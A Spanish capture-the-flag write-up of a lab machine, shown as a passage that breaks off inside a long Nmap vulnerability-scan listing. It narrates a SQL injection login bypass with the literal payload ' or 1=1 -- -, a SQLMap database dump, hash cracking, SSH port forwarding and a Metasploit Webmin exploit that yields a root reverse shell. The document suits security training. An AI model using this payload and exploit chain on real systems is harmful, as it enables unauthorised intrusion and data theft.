🎢ZONA DE JUEGOS
Aprenda a hackear esta máquina. ¡Comprenda cómo usar SQLMap, descifre algunas contraseñas, revele servicios usando un túnel SSH inverso y escale sus privilegios a root!
RESUMEN:
Comencé mi aventura de hacking con una búsqueda en el codigo HTML de la maquina para encontrar o ver bien la imagen que en una ruta la encontre viendola bien y estaba relacionada con "Hitman ", y tras buscar el nombre del personaje, descubrí que se trataba de "Agent 47".
Mi siguiente paso fue realizar un escaneo Nmap para identificar los servicios en la máquina. Solo encontré los puertos 22 (SSH) y 80 (HTTP) abiertos, así que decidí explorar el sitio web en el puerto 80.
Al ingresar ' or 1=1 -- - en el campo de nombre de usuario y dejar la contraseña vacía o completa, logré iniciar sesión y fui redirigido a portal.php. Una vez dentro, obtuve información suficiente de la funcion de busqueda de peliculas de la base de datos, obteniendo la solicitud REQUEST a traves de BURPSUITE para luego guardarla en un .txt y usarla ejecutando SQLMap y extraer datos de la base de datos. Donde descubrio dos tablas HOST y USERS y descubrí el nombre de usuario "agent47" y una contraseña con hash.
Utilizando JOHN THE RIPPER O la WEB CRACKSTATION, descifré la contraseña y obtuve acceso SSH al sistema con el usuario "agent47". Recogí la bandera de usuario y luego decidí exponer algunos servicios de la máquina utilizando túneles SSH inversos ssh: -L 10000:localhost:10000 agent47@10.10.182.25
Fue entonces cuando noté que el CMS expuesto era Webmin. Después de acceder con las mismas credenciales de agent47, descubrí que la versión de Webmin era 1.580.
Buscando en Metasploit, encontré un EXPLOIT para Webmin (unix/webapp/webmin_show_cgi_exec) y el PAYLOAD (cmd/unix/reverse) los configuré ambos con las opciones necesarias (remarcar que como el servicio reverso ssh lo hicimos sobre nuestro local host habia que poner en el RHOST este localhost que montamos, no directamente la IP de la maquina Victima por que si no fallaba la autenticacion, dado qeu la hace realmente sobre el localhost). Después de ejecutar el exploit, conseguí el tan esperado escalado de privilegios a root recibiendo esta reverse shell.
En resumen, mi viaje implicó desde descubrir pistas en imágenes hasta explotar vulnerabilidades SQLi, descifrar contraseñas, exponer servicios y, finalmente, realizar el escalado de privilegios a root. ¡Una experiencia emocionante en el mundo del hacking!
// Some code
PENTESTING OFENSIVO:
ZONA DE JUEGOS:
-------------------- ANALISIS WEB
INVESTIGAMO LA FOTO EN EL HTML Y VEMOS QUE LA CARGA DEDE EL CSS EN DONDE SE PUEDE VER MEJOR LA IMAGEN Y ES HITMAN:
HTML:
<div id="body_image"> </div>
CSS:
margin: 0px 0px 0px 194px;
height: 431px;
width: 580px;
background: url('images/header_image.png') transparent no-repeat 100% -1px;
z-index: 1;
position: absolute;
overflow: hidden;
ELNOMBRE QUE QUERIA ERA agent 47, BINGO.
-------------- NMAP
ESCANEO NMAP DE LA IP 10.10.125.35:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.125.35
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-30 23:01 UTC
Nmap scan report for ip-10-10-125-35.eu-west-1.compute.internal (10.10.125.35)
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
| PRION:CVE-2016-8858 7.8 https://vulners.com/prion/PRION:CVE-2016-8858
| PRION:CVE-2016-6515 7.8 https://vulners.com/prion/PRION:CVE-2016-6515
| PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT*
| EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT*
| EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT*
| CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858
| CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515
| 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT*
| SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT*
| PRION:CVE-2023-35784 7.5 https://vulners.com/prion/PRION:CVE-2023-35784
| PRION:CVE-2016-10009 7.5 https://vulners.com/prion/PRION:CVE-2016-10009
| PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT*
| CVE-2023-35784 7.5 https://vulners.com/cve/CVE-2023-35784
| CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009
| 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT*
| SSV:92582 7.2 https://vulners.com/seebug/SSV:92582 *EXPLOIT*
| PRION:CVE-2016-10012 7.2 https://vulners.com/prion/PRION:CVE-2016-10012
| PRION:CVE-2015-8325 7.2 https://vulners.com/prion/PRION:CVE-2015-8325
| CVE-2016-10012 7.2 https://vulners.com/cve/CVE-2016-10012
| CVE-2015-8325 7.2 https://vulners.com/cve/CVE-2015-8325
| SSV:92580 6.9 https://vulners.com/seebug/SSV:92580 *EXPLOIT*
| PRION:CVE-2016-10010 6.9 https://vulners.com/prion/PRION:CVE-2016-10010
| CVE-2016-10010 6.9 https://vulners.com/cve/CVE-2016-10010
| 1337DAY-ID-26577 6.9 https://vulners.com/zdt/1337DAY-ID-26577 *EXPLOIT*
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSV:91041 5.5 https://vulners.com/seebug/SSV:91041 *EXPLOIT*
| PRION:CVE-2016-3115 5.5 https://vulners.com/prion/PRION:CVE-2016-3115
| PACKETSTORM:140019 5.5 https://vulners.com/packetstorm/PACKETSTORM:140019 *EXPLOIT*
| PACKETSTORM:136234 5.5 https://vulners.com/packetstorm/PACKETSTORM:136234 *EXPLOIT*
| EXPLOITPACK:F92411A645D85F05BDBD274FD222226F 5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F *EXPLOIT*
| EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 *EXPLOIT*
| EXPLOITPACK:1902C998CBF9154396911926B4C3B330 5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330 *EXPLOIT*
| EDB-ID:40858 5.5 https://vulners.com/exploitdb/EDB-ID:40858 *EXPLOIT*
| EDB-ID:40119 5.5 https://vulners.com/exploitdb/EDB-ID:40119 *EXPLOIT*
| EDB-ID:39569 5.5 https://vulners.com/exploitdb/EDB-ID:39569 *EXPLOIT*
| CVE-2016-3115 5.5 https://vulners.com/cve/CVE-2016-3115
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PRION:CVE-2023-27567 5.0 https://vulners.com/prion/PRION:CVE-2023-27567
| PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919
| PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473
| PRION:CVE-2017-15906 5.0 https://vulners.com/prion/PRION:CVE-2017-15906
| PRION:CVE-2016-10708 5.0 https://vulners.com/prion/PRION:CVE-2016-10708
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905
| PRION:CVE-2023-29323 4.3 https://vulners.com/prion/PRION:CVE-2023-29323
| PRION:CVE-2016-6210 4.3 https://vulners.com/prion/PRION:CVE-2016-6210
| EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF *EXPLOIT*
| EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF *EXPLOIT*
| EDB-ID:40136 4.3 https://vulners.com/exploitdb/EDB-ID:40136 *EXPLOIT*
| EDB-ID:40113 4.3 https://vulners.com/exploitdb/EDB-ID:40113 *EXPLOIT*
| CVE-2023-29323 4.3 https://vulners.com/cve/CVE-2023-29323
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-6210 4.3 https://vulners.com/cve/CVE-2016-6210
| 1337DAY-ID-25440 4.3 https://vulners.com/zdt/1337DAY-ID-25440 *EXPLOIT*
| 1337DAY-ID-25438 4.3 https://vulners.com/zdt/1337DAY-ID-25438 *EXPLOIT*
| PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110
| PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111
| PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| SSV:92581 2.1 https://vulners.com/seebug/SSV:92581 *EXPLOIT*
| PRION:CVE-2016-10011 2.1 https://vulners.com/prion/PRION:CVE-2016-10011
| CVE-2016-10011 2.1 https://vulners.com/cve/CVE-2016-10011
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
| PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT*
| PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| OSV:BIT-APACHE-2020-1927 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-1934 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740
| CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| OSV:BIT-APACHE-2020-11985 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11985
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
